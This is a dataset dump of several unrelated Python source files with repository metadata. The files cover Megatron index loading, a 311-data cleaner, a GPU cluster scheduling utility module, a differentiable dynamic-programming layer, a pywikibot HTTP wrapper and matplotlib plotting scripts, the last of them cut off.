counts = torch.cuda.LongTensor([1])
torch.distributed.all_reduce(counts, group=mpu.get_data_parallel_group())
assert counts[0].item() == torch.distributed.get_world_size(
group=mpu.get_data_parallel_group())
# Load indexed dataset.
print_rank_0(' > loading indexed mapping from {}'.format(
indexmap_filename))
start_time = time.time()
mapping_array = np.load(indexmap_filename, allow_pickle=True, mmap_mode='r')
samples_mapping = BlockSamplesMapping(mapping_array)
print_rank_0(' loaded indexed file in {:3.3f} seconds'.format(
time.time() - start_time))
print_rank_0(' total number of samples: {}'.format(
mapping_array.shape[0]))
return samples_mapping
| 38.005025 | 104 | 0.665609 |
fbcfd0fd3b36832c775e1e2833a173c422c32911 | 1,701 | py | Python | server/src/services/dataCleaner.py | JRHutson/311-data | 4af3899d29a00cc090cf4c04a57863096b30bf7a | [
"MIT"
] | null | null | null | server/src/services/dataCleaner.py | JRHutson/311-data | 4af3899d29a00cc090cf4c04a57863096b30bf7a | [
"MIT"
] | null | null | null | server/src/services/dataCleaner.py | JRHutson/311-data | 4af3899d29a00cc090cf4c04a57863096b30bf7a | [
"MIT"
] | null | null | null | import sqlalchemy as db
import pandas as pd
from sqlIngest import DataHandler
import databaseOrm
class DataCleaner(DataHandler):
def __init__(self, config=None, configFilePath=None, separator=','):
self.data = None
self.config = config
self.dbString = None if not self.config \
else self.config['Database']['DB_CONNECTION_STRING']
self.filePath = None
self.configFilePath = configFilePath
self.separator = separator
self.fields = databaseOrm.tableFields
self.insertParams = databaseOrm.insertFields
self.readParams = databaseOrm.readFields
def fetchData(self):
'''Retrieve data from mySql database instance'''
engine = db.create_engine(self.dbString)
self.data = pd.read_sql('ingest_staging_table',
con=engine,
index_col='srnumber')
def formatData(self):
'''Perform changes to data formatting to ensure compatibility
with cleaning and frontend processes'''
pass
def groupData(self):
'''Cluster data by geographic area to remove repeat instances
of 311 reports'''
pass
def cleaningReport(self):
'''Write out cleaning report summarizing operations performed
on data as well as data characteristics'''
pass
if __name__ == "__main__":
'''Class DataHandler workflow from initial load to SQL population'''
cleaner = DataCleaner()
cleaner.loadConfig(configFilePath='../settings.cfg')
cleaner.fetchData()
# can use inherited ingestData method to write to table
cleaner.ingestData(tableName='clean_data')
| 34.02 | 72 | 0.654909 |
51aa25a8c207a49d5c938409a7a711d479839ef7 | 143 | py | Python | data_loader.py | bboltt/Bisect-K-Means | 41776f2abf55be77e14e8017c1271f3f3d434fc2 | [
"MIT"
] | null | null | null | data_loader.py | bboltt/Bisect-K-Means | 41776f2abf55be77e14e8017c1271f3f3d434fc2 | [
"MIT"
] | null | null | null | data_loader.py | bboltt/Bisect-K-Means | 41776f2abf55be77e14e8017c1271f3f3d434fc2 | [
"MIT"
] | null | null | null | import numpy as np
"""
load data as numpy array
"""
def get_dat_sets(file_path):
samples = np.genfromtxt(file_path)
return samples
| 11.916667 | 38 | 0.699301 |
e6aa609984136ea546ffcf98e08f120fb5723920 | 619 | py | Python | python/vechist/plot_vec.py | xintong-osu/VecHist | 83ed3533bd140848431908699adc1f0134463ea1 | [
"MIT"
] | 2 | 2019-11-02T12:35:33.000Z | 2020-04-04T13:30:40.000Z | python/vechist/plot_vec.py | xintong-osu/VecHist | 83ed3533bd140848431908699adc1f0134463ea1 | [
"MIT"
] | null | null | null | python/vechist/plot_vec.py | xintong-osu/VecHist | 83ed3533bd140848431908699adc1f0134463ea1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 19 01:04:40 2015
@author: tong
"""
def plot(d, stride):
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_aspect('equal')
d = d[::stride,::stride,::stride,:]
y, z, x = np.meshgrid(np.arange(0, d.shape[1]), np.arange(0, d.shape[0]), np.arange(0, d.shape[2]))
# print(d[:,:,:,0].shape)
# print(x.shape)
# print(y.shape)
# print(z.shape)
ax.quiver(x, y, z, d[:,:,:,0], d[:,:,:,1], d[:,:,:,2])
plt.show() | 22.925926 | 103 | 0.544426 |
1566627a759f95d60bd9acdaa930ed7eb4e23cca | 4,772 | py | Python | dp_layer/dp_function.py | NYU-DICE-Lab/graph_invnet | 166db79ac9ab3bff0e67ab0ec978da7efea042e2 | [
"MIT"
] | null | null | null | dp_layer/dp_function.py | NYU-DICE-Lab/graph_invnet | 166db79ac9ab3bff0e67ab0ec978da7efea042e2 | [
"MIT"
] | 4 | 2021-06-08T23:01:47.000Z | 2022-03-12T00:53:53.000Z | dp_layer/dp_function.py | NYU-DICE-Lab/graph_invnet | 166db79ac9ab3bff0e67ab0ec978da7efea042e2 | [
"MIT"
] | null | null | null | import torch
from torch.autograd import Function
class DPFunction(Function):
def __init__(self):
super(DPFunction, self).__init__()
@staticmethod
def forward(ctx, input, adj_array, rev_adj, max_op,replace):
'''
Parameters
----------
input: numpy.ndarray
shape nxn
Returns
-------
v: int
Shortest path value computed by soft-DP
image_grad: numpy.ndarray
Gradient of the loss w.r.t the image pixel values
true_shortest_path: int
Shortest path value computed by hard-DP
'''
if not ctx.needs_input_grad[0]:
return DPFunction.hard_forward(input,adj_array,max_op,replace)
device=input.device
d_type=input.dtype
op=DPFunction.s_min
hard_op=torch.min
if max_op:
op=DPFunction.s_max
hard_op=torch.max
ctx.rev_map=rev_adj
thetas = input
batch_size,n_nodes,_= thetas.shape
assert n_nodes>1
V_hard=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device)
V=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device)
Q=torch.zeros((batch_size,n_nodes,4),dtype=d_type,device=device)
if replace==0:
V[:,-1]=replace
V_hard[:,-1]=replace
else:
V[:, -1] += replace
V_hard[:, -1] += replace
V[:-2] = 0
V_hard[:-2]= 0
for i in reversed(range(n_nodes-1)):
theta=thetas[:,i,:]
idxs=adj_array[i]
for dir,idx in enumerate(idxs):
if idx is None:
idxs[dir]=n_nodes
values=torch.stack([V[:,i] for i in idxs],dim=1)
options=values+theta
soft=op(options)
V[:,i],Q[:,i,:]=soft[0],soft[1]
hard_values = torch.stack([V_hard[:, i] for i in idxs], dim=1)
hard_options=hard_values+theta
V_hard[:,i]=hard_op(hard_options,dim=1)[0]
v_hard=V_hard[:,0]
ctx.save_for_backward(v_hard,Q)
return v_hard
@staticmethod
def backward(ctx,v_grad):
'''v_grad is the gradient of the loss with respect to v_hard'''
v_hard,Q = ctx.saved_tensors
b,n,_=Q.shape
E_hat=torch.zeros((b,n),dtype=Q.dtype,device=Q.device)
E = torch.zeros((b,n,4),dtype=Q.dtype,device=Q.device)
E[:,0,:]=Q[:,0,:]
E_hat[:,0]=1
for i in range(1,n):
back_idxs=ctx.rev_map[i]
total=torch.zeros((b),dtype=Q.dtype,device=Q.device)
for dir_idx,back_idx in enumerate(back_idxs):
if back_idx is not None and dir_idx <n:
parent=Q[:,back_idx,dir_idx]*E_hat[:,back_idx]
#E_hat is total effect of parent node on loss
#so parent represents the current node's effect on parent
total+=parent
E[:,back_idx,dir_idx]=parent
E_hat[:,i]=total
full_grad=v_grad.view(-1,1,1)*E
return full_grad,None,None,None,None
@staticmethod
def s_max(options):
max_x = torch.max(options, dim=1)[0].view(-1, 1)
exp_x = torch.exp(options - max_x)
Z = torch.sum(exp_x, dim=1).unsqueeze(-1)
smooth_max = (torch.log(Z) + max_x).squeeze()
probs = exp_x / Z
return smooth_max, probs
@staticmethod
def s_min(options):
neg_options = -1 * options
s_min_val, s_argmin = DPFunction.s_max(neg_options)
s_min_val *= -1
return s_min_val, s_argmin
@staticmethod
def hard_forward(input, adj_array, max_op,replace):
'''Computes v_hard as in forward(), but without any of the additional
computation needed to make function differentiable'''
device=input.device
d_type=input.dtype
hard_op=torch.min
if max_op:
hard_op=torch.max
thetas = input
batch_size,n_nodes,_= thetas.shape
assert n_nodes>1
V_hard=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device)
if replace==0:
V_hard[:,-1]=replace
else:
V_hard[:, -1] += replace
V_hard[:,-2]= 0
for i in reversed(range(n_nodes-1)):
theta=thetas[:,i,:]
idxs=adj_array[i]
for dir,idx in enumerate(idxs):
if idx is None:
idxs[dir]=n_nodes
hard_values = torch.stack([V_hard[:, i] for i in idxs], dim=1)
hard_options=hard_values+theta
V_hard[:,i]=hard_op(hard_options,dim=1)[0]
v_hard=V_hard[:,0]
return v_hard | 34.330935 | 77 | 0.554484 |
b79ddf75bbba445dd088867b6f5092289037d8f5 | 22,758 | py | Python | cluster_scheduling/scheduler/utils.py | stanford-futuredata/POP | baa041dc67a465b8111e22e215880fa7d4fe8c61 | [
"MIT"
] | 15 | 2021-09-24T14:03:52.000Z | 2022-03-28T15:44:21.000Z | cluster_scheduling/scheduler/utils.py | stanford-futuredata/POP | baa041dc67a465b8111e22e215880fa7d4fe8c61 | [
"MIT"
] | 1 | 2021-12-14T09:05:29.000Z | 2021-12-16T11:55:55.000Z | cluster_scheduling/scheduler/utils.py | stanford-futuredata/POP | baa041dc67a465b8111e22e215880fa7d4fe8c61 | [
"MIT"
] | 2 | 2022-01-05T12:29:01.000Z | 2022-01-15T03:10:11.000Z | import csv
from datetime import datetime
import json
import os
import pickle
import psutil
import random
import re
import socket
import subprocess
from job import Job
from job_table import JobTable
from policies import allox, fifo, finish_time_fairness, gandiva, isolated, \
max_min_fairness, max_min_fairness_water_filling, max_sum_throughput, \
min_total_duration
def _generate_scale_factor(rng):
# Sample the scale factor from the Philly distribution.
scale_factor = 1
r = rng.uniform(0, 1)
if 0.7 <= r <= 0.8:
scale_factor = 2
elif 0.8 <= r <= 0.95:
scale_factor = 4
elif 0.95 <= r:
scale_factor = 8
return scale_factor
def _generate_duration(rng):
# Sample the job duration from the Philly distribution.
if rng.random() >= 0.8:
run_time = 60 * (10 ** rng.uniform(3, 4))
else:
run_time = 60 * (10 ** rng.uniform(1.5, 3))
return run_time
def generate_job(throughputs, reference_worker_type='v100', rng=None,
job_id=None, fixed_job_duration=None,
generate_multi_gpu_jobs=False,
generate_multi_priority_jobs=False, run_dir=None,
scale_factor_generator_func=_generate_scale_factor,
duration_generator_func=_generate_duration,
scale_factor_rng=None, duration_rng=None, SLO_rng=None,
always_generate_scale_factor=True):
"""Generates a new job.
Args:
throughputs: A dict containing pre-measured throughputs.
reference_worker_type: The worker type to use when calculating steps.
rng: A random number generator for selecting job parameters.
job_id: The job's ID.
fixed_job_duration: If set, fixes the duration to the specified value.
generate_multi_gpu_jobs: If set, generate a scale factor >= 1.
generate_multi_priority_jobs: If set, generate a priority >= 1.
run_dir: The directory to run the job from.
scale_factor_generator_func: A function that accepts an RNG parameter
and returns a job size.
duration_generator_func: A function that accepts an RNG parameter and
returns a job duration in seconds.
scale_factor_rng: A random number generator specifically for
generating scale factors.
duration_rng: A random number generator specifically for generating
durations.
SLO_rng: If set, generate an SLO >= 1 using this RNG.
always_generate_scale_factor: If set, generate a scale factor
regardless of whether user has
requested multi-GPU jobs.
Returns:
The generated Job.
"""
if rng is None:
rng = random.Random()
if scale_factor_rng is None:
scale_factor_rng = rng
if duration_rng is None:
duration_rng = rng
job_template = None
if always_generate_scale_factor:
scale_factor = scale_factor_generator_func(scale_factor_rng)
else:
# NOTE: We select the job template here to maintain backwards
# compatability with scripts/utils/generate_trace.py
job_template = rng.choice(JobTable)
if generate_multi_gpu_jobs and job_template.distributed:
scale_factor = scale_factor_generator_func(scale_factor_rng)
else:
scale_factor = 1
if fixed_job_duration:
run_time = fixed_job_duration
else:
run_time = duration_generator_func(duration_rng)
if not generate_multi_gpu_jobs:
scale_factor = 1
assert(run_time > 0)
assert(scale_factor >= 1 and scale_factor <= 8)
# Sample the job type.
if job_template is None:
while True:
job_template = rng.choice(JobTable)
if (scale_factor == 1 or
(scale_factor > 1 and job_template.distributed)):
break
job_type = job_template.model
# Complete the job command with the run directory.
command = job_template.command
if run_dir is not None:
if job_template.needs_data_dir:
command = command % (run_dir, run_dir)
else:
command = command % (run_dir)
# Compute the number of steps the job will run for given its duration.
key = (job_type, scale_factor)
assert(key in throughputs[reference_worker_type])
num_steps = run_time * throughputs[reference_worker_type][key]['null']
assert(num_steps > 0)
# Optionally assign a priority to the job.
priority_weight = 1.0
if generate_multi_priority_jobs:
r = rng.uniform(0, 1)
if 0.0 <= r <= 0.2:
priority_weight = 5.0
# Optionally assign an SLO to the job.
SLO = None
if SLO_rng is not None:
r = SLO_rng.uniform(0, 1)
if 0.0 <= r < 0.33:
SLO = 1.2
elif 0.33 <= r < 0.67:
SLO = 2.0
else:
SLO = 10.0
job = Job(job_id=job_id,
job_type=job_type,
command=command,
working_directory=job_template.working_directory,
num_steps_arg=job_template.num_steps_arg,
total_steps=num_steps,
duration=run_time,
scale_factor=scale_factor,
priority_weight=priority_weight,
SLO=SLO,
needs_data_dir=job_template.needs_data_dir)
return job
def load_philly_job_distribution():
with open('philly_job_distribution.pickle', 'rb') as f:
return pickle.load(f)
def get_ip_address():
hostname = socket.gethostname()
ip_address = socket.gethostbyname(hostname)
return ip_address
def get_num_gpus():
command = 'nvidia-smi -L'
output = subprocess.run(command, stdout=subprocess.PIPE, check=True,
shell=True).stdout.decode('utf-8').strip()
return len(output.split('\n'))
def get_pid_for_job(command):
pids = []
for proc in psutil.process_iter():
cmdline = ' '.join(proc.cmdline())
if cmdline == command:
pids.append(proc.pid)
return min(pids)
def get_gpu_processes():
output = subprocess.check_output('nvidia-smi').decode('utf-8')
gpu_processes = {}
processes_flag = False
for line in output.split('\n'):
if 'Processes' in line:
processes_flag = True
continue
if processes_flag:
res = re.search('(\d+) +(\d+) +(\w+) +(.+) +(\d+)MiB', line)
if res is not None:
gpu_id = int(res.group(1))
if gpu_id not in gpu_processes:
gpu_processes[gpu_id] = []
pid = int(res.group(2))
process_name = res.group(4)
if process_name != 'nvidia-cuda-mps-server':
gpu_processes[gpu_id].append(pid)
return gpu_processes
def get_available_policies():
return ['allox',
'fifo', 'fifo_perf', 'fifo_packed',
'finish_time_fairness',
'finish_time_fairness_perf',
'finish_time_fairness_packed',
'gandiva',
'isolated',
'max_min_fairness',
'max_min_fairness_perf',
'max_min_fairness_packed',
'max_min_fairness_water_filling',
'max_min_fairness_water_filling_perf',
'max_min_fairness_water_filling_packed',
'max_sum_throughput_perf',
'max_sum_throughput_normalized_by_cost_perf',
'max_sum_throughput_normalized_by_cost_perf_SLOs',
'max_sum_throughput_normalized_by_cost_packed_SLOs',
'min_total_duration',
'min_total_duration_perf',
'min_total_duration_packed',
]
def read_per_instance_type_spot_prices_aws(directory):
# TODO: Make this flexible.
directory = os.path.join(directory, 'us-east-1')
per_instance_type_spot_prices = {}
for filename in os.listdir(directory):
full_filepath = os.path.join(directory, filename)
with open(full_filepath, 'r') as f:
json_obj = json.load(f)
for x in json_obj['SpotPriceHistory']:
instance_type = x['InstanceType']
if instance_type not in per_instance_type_spot_prices:
per_instance_type_spot_prices[instance_type] = []
per_instance_type_spot_prices[instance_type].append(x)
return per_instance_type_spot_prices
def read_per_instance_type_spot_prices_azure(directory):
per_instance_type_spot_prices = {}
for filename in os.listdir(directory):
full_filepath = os.path.join(directory, filename)
with open(full_filepath, 'r') as f:
zone = filename.replace(".csv", "")
reader = csv.reader(f)
i = 0
for row in reader:
if i == 0:
header = row
for header_elem in header[1:]:
if header_elem not in per_instance_type_spot_prices:
per_instance_type_spot_prices[header_elem] = {}
else:
for (header_elem, row_elem) in zip(header[1:], row[1:]):
if (zone not in per_instance_type_spot_prices[header_elem]):
per_instance_type_spot_prices[header_elem][zone] = []
date = datetime.strptime(row[0], '%m/%d/%Y')
per_instance_type_spot_prices[header_elem][zone].append((date, row_elem))
i += 1
return per_instance_type_spot_prices
def read_per_instance_type_spot_prices_json(directory):
per_instance_type_spot_prices = {}
per_instance_type_spot_prices['aws'] = \
read_per_instance_type_spot_prices_aws(os.path.join(directory,
'aws/logs'))
per_instance_type_spot_prices['azure'] = \
read_per_instance_type_spot_prices_azure(os.path.join(directory,
'azure/logs'))
per_instance_type_spot_prices['gcp'] = {
'v100': 0.74,
'p100': 0.43,
'k80': 0.135
}
return per_instance_type_spot_prices
def get_latest_price_for_worker_type_aws(worker_type, current_time,
per_instance_type_spot_prices):
# TODO: Make this function more efficient.
if worker_type == 'v100':
instance_type = 'p3.2xlarge'
elif worker_type == 'p100':
# NOTE: AWS does not have single P100 instances, use 1.5x K80 price
# as a proxy.
instance_type = 'p2.xlarge'
elif worker_type == 'k80':
instance_type = 'p2.xlarge'
timestamps = [datetime.strptime(x['Timestamp'], '%Y-%m-%dT%H:%M:%S.000Z')
for x in per_instance_type_spot_prices[instance_type]]
timestamps.sort()
availability_zones = \
[x['AvailabilityZone']
for x in per_instance_type_spot_prices[instance_type]]
latest_prices = []
for availability_zone in set(availability_zones):
per_instance_type_spot_prices[instance_type].sort(
key=lambda x: datetime.strptime(x['Timestamp'],
'%Y-%m-%dT%H:%M:%S.000Z'))
latest_price = None
for x in per_instance_type_spot_prices[instance_type]:
if x['AvailabilityZone'] != availability_zone:
continue
timestamp = (datetime.strptime(x['Timestamp'],
'%Y-%m-%dT%H:%M:%S.000Z') -
timestamps[0]).total_seconds()
if timestamp > current_time and latest_price is not None:
break
latest_price = float(x['SpotPrice'])
assert(latest_price is not None)
latest_prices.append(latest_price)
# NOTE: AWS does not have single P100 instances, use 1.5x K80 price
# as a proxy.
if worker_type == 'p100':
return min(latest_prices) * 1.5
else:
return min(latest_prices)
def get_latest_price_for_worker_type_gcp(worker_type, current_time,
per_instance_type_spot_prices):
return per_instance_type_spot_prices[worker_type]
def get_latest_price_for_worker_type_azure(worker_type, current_time,
per_instance_type_spot_prices):
if worker_type == 'k80':
instance_type = 'NC6'
elif worker_type == 'p100':
instance_type = 'NC6s v2'
elif worker_type == 'v100':
instance_type = 'NC6s v3'
earliest_timestamps = []
for zone in per_instance_type_spot_prices[instance_type]:
per_instance_type_spot_prices[instance_type][zone].sort(
key=lambda x: x[0])
earliest_timestamps.append(
per_instance_type_spot_prices[instance_type][zone][0][0])
earliest_timestamp = min(earliest_timestamps)
latest_prices = []
for zone in per_instance_type_spot_prices[instance_type]:
latest_price = None
for x in per_instance_type_spot_prices[instance_type][zone]:
timestamp = (x[0] - earliest_timestamp).total_seconds()
if timestamp > current_time and latest_price is not None:
break
elif x[1] == '':
continue
else:
# Remove '$' character.
latest_price = float(x[1][1:])
return latest_price
def get_latest_price_for_worker_type(worker_type, current_time,
per_instance_type_spot_prices,
available_clouds):
assert(len(available_clouds) > 0)
prices = []
if 'aws' in available_clouds:
aws_price = \
get_latest_price_for_worker_type_aws(
worker_type, current_time,
per_instance_type_spot_prices['aws'])
prices.append(aws_price)
if 'gcp' in available_clouds:
gcp_price = \
get_latest_price_for_worker_type_gcp(
worker_type, current_time,
per_instance_type_spot_prices['gcp'])
prices.append(gcp_price)
if 'azure' in available_clouds:
azure_price = \
get_latest_price_for_worker_type_azure(
worker_type, current_time,
per_instance_type_spot_prices['azure'])
prices.append(azure_price)
return min(prices)
def parse_job_type_str(job_type):
if job_type is None:
return None
match = re.match('(.*) \(scale factor (\d+)\)', job_type)
if match is None:
return (job_type, 1)
model = match.group(1)
scale_factor = int(match.group(2))
return (model, scale_factor)
def parse_job_type_tuple(job_type):
match = re.match('\(\'(.*)\', (\d+)\)', job_type)
if match is None:
return None
model = match.group(1)
scale_factor = int(match.group(2))
return (model, scale_factor)
def stringify_throughputs(throughputs):
stringified_throughputs = {}
for worker_type in throughputs:
stringified_throughputs[worker_type] = {}
for key in throughputs[worker_type]:
stringified_throughputs[worker_type][str(key)] = {}
for other_key in throughputs[worker_type][key]:
stringified_throughputs[worker_type][str(key)][str(other_key)] = \
throughputs[worker_type][key][other_key]
return stringified_throughputs
def read_all_throughputs_json_v2(file_name):
with open(file_name, 'r') as f:
raw_throughputs = json.load(f)
parsed_throughputs = {}
for worker_type in raw_throughputs:
parsed_throughputs[worker_type] = {}
for job_type in raw_throughputs[worker_type]:
key = parse_job_type_tuple(job_type)
assert(key is not None)
parsed_throughputs[worker_type][key] = {}
for other_job_type in raw_throughputs[worker_type][job_type]:
if other_job_type == 'null':
other_key = other_job_type
else:
other_key = parse_job_type_tuple(other_job_type)
assert(other_key is not None)
parsed_throughputs[worker_type][key][other_key] =\
raw_throughputs[worker_type][job_type][other_job_type]
return parsed_throughputs
def read_all_throughputs_json(throughputs_file):
with open(throughputs_file, 'r') as f:
throughputs = json.load(f)
return throughputs
def get_policy(policy_name, solver=None, seed=None,
priority_reweighting_policies=None,
num_threads=None):
if policy_name.startswith('allox'):
if policy_name == 'allox':
alpha = 1.0
else:
alpha = float(policy_name.split("allox_alpha=")[1])
policy = allox.AlloXPolicy(alpha=alpha)
elif policy_name == 'fifo':
policy = fifo.FIFOPolicy(seed=seed)
elif policy_name == 'fifo_perf':
policy = fifo.FIFOPolicyWithPerf()
elif policy_name == 'fifo_packed':
policy = fifo.FIFOPolicyWithPacking()
elif policy_name == 'finish_time_fairness':
policy = finish_time_fairness.FinishTimeFairnessPolicy(solver=solver,
num_threads=num_threads)
elif policy_name == 'finish_time_fairness_perf':
policy = \
finish_time_fairness.FinishTimeFairnessPolicyWithPerf(solver=solver,
num_threads=num_threads)
elif policy_name == 'finish_time_fairness_packed':
policy = \
finish_time_fairness.FinishTimeFairnessPolicyWithPacking(
solver=solver, num_threads=num_threads)
elif policy_name == 'gandiva':
policy = gandiva.GandivaPolicy(seed=seed)
elif policy_name == 'isolated':
policy = isolated.IsolatedPolicy()
elif policy_name == 'max_min_fairness':
policy = max_min_fairness.MaxMinFairnessPolicy(solver=solver)
elif policy_name == 'max_min_fairness_perf':
policy = max_min_fairness.MaxMinFairnessPolicyWithPerf(solver=solver,
num_threads=num_threads)
elif policy_name == 'max_min_fairness_packed':
policy = \
max_min_fairness.MaxMinFairnessPolicyWithPacking(solver=solver,
num_threads=num_threads)
elif policy_name == 'max_min_fairness_water_filling':
policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicy(
priority_reweighting_policies=priority_reweighting_policies)
elif policy_name == 'max_min_fairness_water_filling_perf':
policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicyWithPerf(
priority_reweighting_policies=priority_reweighting_policies)
elif policy_name == 'max_min_fairness_water_filling_packed':
policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicyWithPacking(
priority_reweighting_policies=priority_reweighting_policies)
elif policy_name == 'max_sum_throughput_perf':
policy = max_sum_throughput.ThroughputSumWithPerf(solver=solver,
num_threads=num_threads)
elif policy_name == 'max_sum_throughput_normalized_by_cost_perf':
policy = max_sum_throughput.ThroughputNormalizedByCostSumWithPerf(
solver=solver, num_threads=num_threads)
elif policy_name == 'max_sum_throughput_normalized_by_cost_perf_SLOs':
policy = max_sum_throughput.ThroughputNormalizedByCostSumWithPerfSLOs(
solver=solver, num_threads=num_threads)
elif policy_name == 'max_sum_throughput_normalized_by_cost_packed_SLOs':
policy = \
max_sum_throughput.ThroughputNormalizedByCostSumWithPackingSLOs(
solver=solver,
num_threads=num_threads)
elif policy_name == 'min_total_duration':
policy = min_total_duration.MinTotalDurationPolicy(solver=solver,
num_threads=num_threads)
elif policy_name == 'min_total_duration_perf':
policy = min_total_duration.MinTotalDurationPolicyWithPerf(solver=solver,
num_threads=num_threads)
elif policy_name == 'min_total_duration_packed':
policy = \
min_total_duration.MinTotalDurationPolicyWithPacking(solver=solver,
num_threads=num_threads)
else:
raise ValueError('Unknown policy!')
return policy
def parse_trace(trace_file):
jobs = []
arrival_times = []
with open(trace_file, 'r') as f:
for line in f:
(job_type, command, working_directory, num_steps_arg,
needs_data_dir, total_steps, scale_factor, priority_weight, SLO,
arrival_time) = line.split('\t')
assert(int(scale_factor) >= 1)
jobs.append(Job(job_id=None,
job_type=job_type,
command=command,
working_directory=working_directory,
needs_data_dir=bool(int(needs_data_dir)),
num_steps_arg=num_steps_arg,
total_steps=int(total_steps),
duration=None,
scale_factor=int(scale_factor),
priority_weight=float(priority_weight),
SLO=float(SLO)))
arrival_times.append(float(arrival_time))
return jobs, arrival_times
def print_allocation(allocation, current_time=None):
"""Prints the allocation.
Debug method used for printing the allocation of each job on each
worker type.
"""
print('=' * 80)
if current_time is not None:
print('Allocation\t(Current_time: %f)' % (current_time))
print('-' * 80)
for job_id in sorted(list(allocation.keys())):
allocation_str = 'Job ID %s:' % (job_id)
for worker_type in sorted(list(allocation[job_id].keys())):
value = allocation[job_id][worker_type]
allocation_str += ' [%s: %f]' % (worker_type, value)
print(allocation_str)
print('=' * 80)
| 41.378182 | 97 | 0.610994 |
6c6f72a68abcba50195a52f81db48437b09bf58a | 5,541 | py | Python | pywikibot/comms/threadedhttp.py | valhallasw/pywikibot-core | 32a8c3c1298a5cb077381fe202daefde82c1c5d3 | [
"MIT"
] | null | null | null | pywikibot/comms/threadedhttp.py | valhallasw/pywikibot-core | 32a8c3c1298a5cb077381fe202daefde82c1c5d3 | [
"MIT"
] | null | null | null | pywikibot/comms/threadedhttp.py | valhallasw/pywikibot-core | 32a8c3c1298a5cb077381fe202daefde82c1c5d3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Http backend layer, formerly providing a httplib2 wrapper."""
from __future__ import unicode_literals
# (C) Pywikibot team, 2007-2015
__version__ = '$Id: 6c6f72a68abcba50195a52f81db48437b09bf58a $'
__docformat__ = 'epytext'
# standard python libraries
import codecs
import sys
if sys.version_info[0] > 2:
from urllib.parse import urlparse
else:
from urlparse import urlparse
import pywikibot
from pywikibot.tools import UnicodeMixin
_logger = "comm.threadedhttp"
class HttpRequest(UnicodeMixin):
"""Object wrapper for HTTP requests that need to block origin thread.
self.data will be either:
* a tuple of (dict, unicode) if the request was successful
* an exception
"""
def __init__(self, uri, method="GET", body=None, headers=None,
callbacks=None, charset=None, **kwargs):
"""
Constructor.
See C{Http.request} for parameters.
"""
self.uri = uri
self.method = method
self.body = body
self.headers = headers
if isinstance(charset, codecs.CodecInfo):
self.charset = charset.name
elif charset:
self.charset = charset
elif headers and 'accept-charset' in headers:
self.charset = headers['accept-charset']
else:
self.charset = None
self.callbacks = callbacks
self.args = [uri, method, body, headers]
self.kwargs = kwargs
self._parsed_uri = None
self._data = None
@property
def data(self):
"""Return the requests response tuple."""
assert(self._data is not None)
return self._data
@data.setter
def data(self, value):
"""Set the requests response and invoke each callback."""
self._data = value
if self.callbacks:
for callback in self.callbacks:
callback(self)
@property
def exception(self):
"""Get the exception, if any."""
if isinstance(self.data, Exception):
return self.data
@property
def response_headers(self):
"""Return the response headers."""
if not self.exception:
return self.data.headers
@property
def raw(self):
"""Return the raw response body."""
if not self.exception:
return self.data.content
@property
def parsed_uri(self):
"""Return the parsed requested uri."""
if not self._parsed_uri:
self._parsed_uri = urlparse(self.uri)
return self._parsed_uri
@property
def hostname(self):
"""Return the host of the request."""
return self.parsed_uri.netloc
@property
def status(self):
"""HTTP response status.
@rtype: int
"""
if not self.exception:
return self.data.status_code
@property
def header_encoding(self):
"""Return charset given by the response header."""
if not hasattr(self, '_header_encoding'):
pos = self.response_headers['content-type'].find('charset=')
if pos >= 0:
pos += len('charset=')
encoding = self.response_headers['content-type'][pos:]
self._header_encoding = encoding
else:
self._header_encoding = None
return self._header_encoding
@property
def encoding(self):
"""Detect the response encoding."""
if not hasattr(self, '_encoding'):
if not self.charset and not self.header_encoding:
pywikibot.log(u"Http response doesn't contain a charset.")
charset = 'latin1'
else:
charset = self.charset
if (self.header_encoding and codecs.lookup(self.header_encoding) !=
(codecs.lookup(charset) if charset else None)):
if charset:
pywikibot.warning(
'Encoding "{0}" requested but "{1}" '
'received in the header.'.format(
charset, self.header_encoding))
try:
# TODO: Buffer decoded content, weakref does remove it too
# early (directly after this method)
self.raw.decode(self.header_encoding)
except UnicodeError as e:
self._encoding = e
else:
self._encoding = self.header_encoding
else:
self._encoding = None
if charset and (isinstance(self._encoding, Exception) or
not self._encoding):
try:
self.raw.decode(charset)
except UnicodeError as e:
self._encoding = e
else:
self._encoding = charset
if isinstance(self._encoding, Exception):
raise self._encoding
return self._encoding
def decode(self, encoding, errors='strict'):
"""Return the decoded response."""
return self.raw.decode(encoding, errors)
@property
def content(self):
"""Return the response decoded by the detected encoding."""
return self.decode(self.encoding)
def __unicode__(self):
"""Return the response decoded by the detected encoding."""
return self.content
def __bytes__(self):
"""Return the undecoded response."""
return self.raw
| 29.951351 | 79 | 0.571016 |
a6929c9d4a47ecf5f13127f442f4eba791ce3748 | 1,249 | py | Python | utils/create_contour_plots.py | sho-87/python-machine-learning | 439556ad5faf549acb8e3923bfed7814fcb1a8ac | [
"MIT"
] | 3 | 2016-11-25T20:34:23.000Z | 2019-09-25T08:03:54.000Z | utils/create_contour_plots.py | sho-87/python-machine-learning | 439556ad5faf549acb8e3923bfed7814fcb1a8ac | [
"MIT"
] | null | null | null | utils/create_contour_plots.py | sho-87/python-machine-learning | 439556ad5faf549acb8e3923bfed7814fcb1a8ac | [
"MIT"
] | 4 | 2017-09-26T01:48:32.000Z | 2019-08-09T22:08:01.000Z | import numpy as np
import matplotlib.pyplot as plt
f, (ax1, ax2) = plt.subplots(1, 2, sharey=False,figsize=(8,4))
# Subplot 1 (left)
xlist = np.linspace(-4.0, 4.0, 100)
ylist = np.linspace(-2.0, 2.0, 100)
X, Y = np.meshgrid(xlist, ylist)
Z = np.sqrt(X ** 2 + Y ** 2 )
levels = [0.0, 0.2, 0.5, 0.9, 1.5, 2.5, 3.5]
contour1 = ax1.contour(X, Y, Z, levels)
# Create legend items
lines = []
for i in range(len(levels)):
lines.append(contour1.collections[i])
# Subplot 2 (right)
xlist = np.linspace(-4.0, 4.0, 100)
ylist = np.linspace(-4, 4, 100)
X, Y = np.meshgrid(xlist, ylist)
